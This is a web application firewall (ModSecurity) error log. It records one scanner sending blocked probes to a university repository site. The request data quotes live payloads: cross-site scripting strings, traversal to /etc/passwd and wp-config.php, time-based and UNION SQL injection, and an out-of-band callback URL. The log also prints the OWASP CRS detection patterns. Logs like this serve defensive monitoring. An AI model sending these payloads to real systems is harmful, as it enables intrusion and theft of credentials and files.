[Tue Aug 29 11:48:13.445335 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repository.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAhujBcAAAAr"]
[Tue Aug 29 11:48:13.445378 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repository.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAhujBcAAAAr"]
[Tue Aug 29 11:48:18.351069 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14ksCo-f0AAAkGCX0AAAAE"]
[Tue Aug 29 11:48:19.408578 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14k8Co-f0AAAfWN8AAAAAL"]
[Tue Aug 29 11:48:21.429564 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjM7K4AAAAT"]
[Tue Aug 29 11:48:21.582878 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAjM7LUAAAAT"]
[Tue Aug 29 11:48:21.640538 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjYrEkAAAAK"]
[Tue Aug 29 11:48:22.391471 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAkdu@EAAAAO"]
[Tue Aug 29 11:48:23.952061 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAj12FYAAAAa"]
[Tue Aug 29 11:48:24.459257 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g4ir78nqe8xjew.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26g4ir78nqe8xjew.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14mMCo-f0AAAjtc-YAAAAX"]
[Tue Aug 29 11:48:28.067373 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14nMCo-f0AAAk1w58AAAAY"]
[Tue Aug 29 11:48:31.648587 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAlJmaIAAAAo"]
[Tue Aug 29 11:48:32.356689 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAlL7A4AAAAq"]
[Tue Aug 29 11:48:33.441485 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAkyx8sAAAAW"]
[Tue Aug 29 11:48:35.390520 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAj12HsAAAAa"]
[Tue Aug 29 11:48:35.404148 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAlFH5kAAAAk"]
[Tue Aug 29 11:48:37.358841 2023] [:error] [pid 2377] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAlJma0AAAAo"]
[Tue Aug 29 11:48:38.382609 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAlIBYoAAAAn"]
[Tue Aug 29 11:48:38.385112 2023] [:error] [pid 2380] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14psCo-f0AAAlM8icAAAAs"]
[Tue Aug 29 11:48:40.358984 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAkAMJkAAAAU"]
[Tue Aug 29 11:48:43.364432 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAjtdBIAAAAX"]
[Tue Aug 29 11:48:43.370964 2023] [:error] [pid 2353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAkxFyUAAAAV"]
[Tue Aug 29 11:48:47.473539 2023] [:error] [pid 2436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAmEnOEAAAAo"]
[Tue Aug 29 11:48:49.382054 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAk7QLAAAAAi"]
[Tue Aug 29 11:48:49.390512 2023] [:error] [pid 2349] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAktzG0AAAAP"]
[Tue Aug 29 11:48:49.446088 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAmHd4cAAAAz"]
[Tue Aug 29 11:48:50.442162 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAlIBZwAAAAn"]
[Tue Aug 29 11:48:52.367503 2023] [:error] [pid 2350] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAku@mMAAAAQ"]
[Tue Aug 29 11:48:53.355766 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tcCo-f0AAAlL7DEAAAAq"]
[Tue Aug 29 11:48:53.367626 2023] [:error] [pid 2418] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAlyrBsAAAAI"]
[Tue Aug 29 11:48:54.435661 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAmIbKUAAAAo"]
